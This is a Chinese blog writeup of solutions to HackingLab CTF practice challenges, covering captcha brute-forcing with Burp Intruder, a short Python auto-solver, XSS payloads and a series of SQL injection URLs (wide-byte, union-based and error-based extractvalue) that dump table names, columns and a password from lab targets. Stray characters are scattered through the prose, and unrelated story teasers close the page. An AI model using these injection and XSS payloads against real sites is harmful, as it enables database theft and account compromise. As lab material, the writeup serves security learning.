hackinglab

選擇題和基礎(chǔ)關(guān)比較簡(jiǎn)單孙技,刷題刷得很爽(可能這就是菜鳥(niǎo)的成就感吧)聪黎,后面的關(guān)卡就......

腳本關(guān)

key又又找不到了

這個(gè)題比較簡(jiǎn)單可都,抓包重放耕姊,發(fā)現(xiàn)flag~


image.png
快速口算

不會(huì)寫(xiě)腳本的我只能百度writeup膀值。棍丐。。沧踏。歌逢。。找到的腳本如下:

#coding=utf-8  
import re #正則模塊
import requests

s = requests.Session()  
url = 'http://1.hacklist.sinaapp.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
r = s.get(url)
r.encoding = 'utf-8'   #修改編碼
print(r.text)
num = re.findall(re.compile(r'<br/>\s+(.*?)='), r.text)[0]  #正則表達(dá)式找到算術(shù)式

print ('result:\n\n%s=%d\n' % (num, eval(num)))  #輸出算術(shù)式計(jì)算結(jié)果
r = s.post(url, data={'v': eval(num)})  #將結(jié)果提交  抓包可看出要用v提交
print (r.text)  #輸出返回結(jié)果
這個(gè)題目是空的

null即可通過(guò)翘狱。

怎么就是不彈出key呢趋翻?

查看源碼,發(fā)現(xiàn)有一段js代碼盒蟆,直接放進(jìn)Chrome控制臺(tái)運(yùn)行踏烙,彈出flag。注意key為chars后的前14個(gè)字符历等。


image.png
逗比驗(yàn)證碼第一期

根據(jù)題目提示讨惩,發(fā)現(xiàn)密碼是首位不為0的四位數(shù)字,同時(shí)驗(yàn)證碼可重復(fù)使用多次寒屯,利用burpsuite的intruder進(jìn)行爆破荐捻。


image.png

找到key!


image.png
逗比驗(yàn)證碼第二期

同上寡夹,雖然驗(yàn)證碼只可用一次处面,但發(fā)現(xiàn)刪除驗(yàn)證碼返回pwd錯(cuò)誤。繼續(xù)進(jìn)行爆破菩掏,找到key魂角。


image.png
逗比驗(yàn)證碼第三期

感覺(jué)和session并沒(méi)有什么關(guān)系,和上一題解題思路一樣智绸,不是很懂野揪,網(wǎng)上是這樣解釋的:

驗(yàn)證碼發(fā)布的流程
1. 顯示表單
2. 顯示驗(yàn)證碼(調(diào)用生成驗(yàn)證碼的程序),將驗(yàn)證碼加密后放進(jìn) session 或者 cookie
3. 用戶提交表單
4. 核對(duì)驗(yàn)證碼無(wú)誤瞧栗、數(shù)據(jù)合法后寫(xiě)入數(shù)據(jù)庫(kù)完成
用戶如果再發(fā)布一條斯稳,正常情況下,會(huì)再次訪問(wèn)表單頁(yè)面迹恐,驗(yàn)證碼圖片被動(dòng)更新挣惰, session 和 cookie 也就跟著變了
但是灌水機(jī)操作不一定非要使用表單頁(yè)面,它可以直接模擬 post 向服務(wù)端程序發(fā)送數(shù)據(jù),這樣驗(yàn)證碼程序沒(méi)有被調(diào)用憎茂,當(dāng)然 session 和 cookie 存儲(chǔ)的加密驗(yàn)證碼就是上次的值珍语,也就沒(méi)有更新,這樣以后無(wú)限次的通過(guò)post直接發(fā)送的數(shù)據(jù)唇辨,而不考慮驗(yàn)證碼廊酣,驗(yàn)證碼形同虛設(shè)!
所以赏枚,在核對(duì)驗(yàn)證碼后先將 session 和 cookie 的值清空亡驰,然后做數(shù)據(jù)合法性判斷,然后入庫(kù)饿幅!這樣凡辱,一個(gè)漏洞就被補(bǔ)上了!
image.png
微笑一下就能過(guò)關(guān)了

分析源碼:


image.png

發(fā)現(xiàn)常用網(wǎng)絡(luò)協(xié)議已經(jīng)過(guò)濾栗恩。


image.png

data協(xié)議格式為:
?????data:資源類(lèi)型;編碼,內(nèi)容
因此透乾,payload:

http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php?^_^=data:,(●'?'●)

逗比的手機(jī)驗(yàn)證碼

先用以前的手機(jī)號(hào)獲取到驗(yàn)證碼,抓包將手機(jī)號(hào)修改即可得到key磕秤。


image.png
基情燃燒的歲月

先用之前的手機(jī)號(hào)登陸乳乌,發(fā)現(xiàn)提示驗(yàn)證碼為開(kāi)頭非0的三位數(shù),進(jìn)行爆破后找到另一個(gè)手機(jī)號(hào)市咆,繼續(xù)進(jìn)行爆破汉操,發(fā)現(xiàn)flag!


image.png
驗(yàn)證碼識(shí)別

圖片驗(yàn)證碼在不斷變化蒙兰,普通的intruder無(wú)法爆破磷瘤,不會(huì)做QAQ

xss基礎(chǔ)關(guān)

在輸入框中隨意提交<script>alert(1)</script>,發(fā)現(xiàn)提示:


image.png

于是提交<script>alert(HackingLab)</script>搜变,得到key值采缚。

XSS基礎(chǔ)2:簡(jiǎn)單繞過(guò)

上一題的payload被過(guò)濾了,換一個(gè):

<img src=# onerror=alert(HackingLab) />

XSS基礎(chǔ)3:檢測(cè)與構(gòu)造

這個(gè)題目過(guò)濾了好多字符挠他,比較菜就不會(huì)@_@后面看了網(wǎng)上的解析:

這個(gè)題當(dāng) value 為敏感字符串時(shí)扳抽,出現(xiàn)的敏感字符串反而不會(huì)被過(guò)濾,這樣就可以構(gòu)造alert' onmouseover=alert(HackingLab)>并提交绩社,將鼠標(biāo)移動(dòng)到第二個(gè)輸入框上方就能觸發(fā)彈窗.

Principle很重要的XSS

不會(huì)做+1摔蓝。。愉耙。。拌滋。朴沿。坐等大佬們的writeup!

注入關(guān)

最簡(jiǎn)單的sql注入

真的很簡(jiǎn)單,注釋符繞過(guò)即可赌渣。

最簡(jiǎn)單的SQL注入(熟悉注入環(huán)境)

查看源碼看到提示找到注入點(diǎn)。
字段數(shù):

http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 order by 3#

但是之后無(wú)法得到顯示位,就很尷尬??后面發(fā)現(xiàn)是我想太多忘晤,payload如下:

http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or 1

防注入

寬字節(jié)注入谷朝。

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' or 1=1%23

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' or 1=1 order by 3%23

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df' union select 1,database(),user()%23

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df%27 union select 1,group_concat(title_1,content_1),3 from mydbs.sae_user_sqli4%23

該題參考自:https://hellohxk.com/blog/hackinglab-writeup/

到底能不能回顯

報(bào)錯(cuò)注入好難啊=-=
不會(huì)做+1
看完其他人的writeup后,稍微有了點(diǎn)頭緒鸿竖。首先沧竟,了解一下mysql注入點(diǎn)在limit關(guān)鍵字后面的利用方法。http://www.freebuf.com/articles/web/57528.html

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(1,concat(0x25,@@version)),1)%23&num=1

payload:

獲取表名:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(1,concat(0x25,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23&num=1
獲取列名:
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(1,concat(0x25,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23&num=1

獲取字段:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from user where username=0x666c6167))),1)%23 &num=100 %23

邂逅

圖片類(lèi)型的寬字節(jié)注入缚忧。


image.png

字段數(shù):4
找到顯示位:3

dog1.jpg%df' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4%23

image.png

dog1.jpg%df' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x61727469636c65),4%23

image.png

dog1.jpg%df' union select 1,2,(select group_concat(id,picname) from mydbs.pic),4%23

image.png

訪問(wèn)http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg悟泵,得:

image.png

ErrorBased

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1, concat(0x3a,(SELECT distinct concat(0x3a,username,0x3a,motto,0x3a,0x3a) FROM motto limit 3,1)))%23

盲注

基于時(shí)間的盲注。

SQL注入通用防護(hù)

cookie存在sql注入闪水。

據(jù)說(shuō)哈希后的密碼是不能產(chǎn)生注入的
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末糕非,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子球榆,更是在濱河造成了極大的恐慌朽肥,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,817評(píng)論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件持钉,死亡現(xiàn)場(chǎng)離奇詭異衡招,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)右钾,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,329評(píng)論 3 385
  • 文/潘曉璐 我一進(jìn)店門(mén)蚁吝,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人舀射,你說(shuō)我怎么就攤上這事窘茁。” “怎么了脆烟?”我有些...
    開(kāi)封第一講書(shū)人閱讀 157,354評(píng)論 0 348
  • 文/不壞的土叔 我叫張陵山林,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我邢羔,道長(zhǎng)驼抹,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 56,498評(píng)論 1 284
  • 正文 為了忘掉前任拜鹤,我火速辦了婚禮框冀,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘敏簿。我一直安慰自己明也,他們只是感情好宣虾,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,600評(píng)論 6 386
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著温数,像睡著了一般绣硝。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上撑刺,一...
    開(kāi)封第一講書(shū)人閱讀 49,829評(píng)論 1 290
  • 那天鹉胖,我揣著相機(jī)與錄音,去河邊找鬼够傍。 笑死甫菠,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的王带。 我是一名探鬼主播淑蔚,決...
    沈念sama閱讀 38,979評(píng)論 3 408
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼愕撰!你這毒婦竟也來(lái)了刹衫?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 37,722評(píng)論 0 266
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤搞挣,失蹤者是張志新(化名)和其女友劉穎带迟,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體囱桨,經(jīng)...
    沈念sama閱讀 44,189評(píng)論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡仓犬,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,519評(píng)論 2 327
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了舍肠。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片搀继。...
    茶點(diǎn)故事閱讀 38,654評(píng)論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖翠语,靈堂內(nèi)的尸體忽然破棺而出叽躯,到底是詐尸還是另有隱情,我是刑警寧澤肌括,帶...
    沈念sama閱讀 34,329評(píng)論 4 330
  • 正文 年R本政府宣布点骑,位于F島的核電站,受9級(jí)特大地震影響谍夭,放射性物質(zhì)發(fā)生泄漏黑滴。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,940評(píng)論 3 313
  • 文/蒙蒙 一紧索、第九天 我趴在偏房一處隱蔽的房頂上張望袁辈。 院中可真熱鬧,春花似錦珠漂、人聲如沸吵瞻。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 30,762評(píng)論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)橡羞。三九已至,卻和暖如春济舆,著一層夾襖步出監(jiān)牢的瞬間卿泽,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 31,993評(píng)論 1 266
  • 我被黑心中介騙來(lái)泰國(guó)打工滋觉, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留签夭,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,382評(píng)論 2 360
  • 正文 我出身青樓椎侠,卻偏偏與公主長(zhǎng)得像第租,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子我纪,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,543評(píng)論 2 349

推薦閱讀更多精彩內(nèi)容

  • web應(yīng)用程序會(huì)對(duì)用戶的輸入進(jìn)行驗(yàn)證慎宾,過(guò)濾其中的一些關(guān)鍵字,這種過(guò)濾我們可以試著用下面的方法避開(kāi)浅悉。 1趟据、 不使用被...
    查無(wú)此人asdasd閱讀 7,266評(píng)論 0 5
  • 基礎(chǔ)篇 alert(HackingLab) 這樣也可以 這題也差不多 http://lab1.xseclab.co...
    查無(wú)此人asdasd閱讀 936評(píng)論 0 1
  • 簽到2 地址:來(lái)源:網(wǎng)絡(luò)攻防大賽 說(shuō)了輸入zhimakaimen,開(kāi)始輸入沒(méi)認(rèn)真看术健,只能輸入10個(gè)數(shù)字汹碱,可是zhi...
    JasonChiu17閱讀 4,734評(píng)論 0 9
  • 一套實(shí)用的滲透測(cè)試崗位面試題,你會(huì)嗎荞估? 1.拿到一個(gè)待檢測(cè)的站咳促,你覺(jué)得應(yīng)該先做什么? 收集信息 whois勘伺、網(wǎng)站源...
    g0閱讀 4,818評(píng)論 0 9
  • 賣(mài)衣服蘿莉控的事情
    聊天了嗎閱讀 166評(píng)論 0 0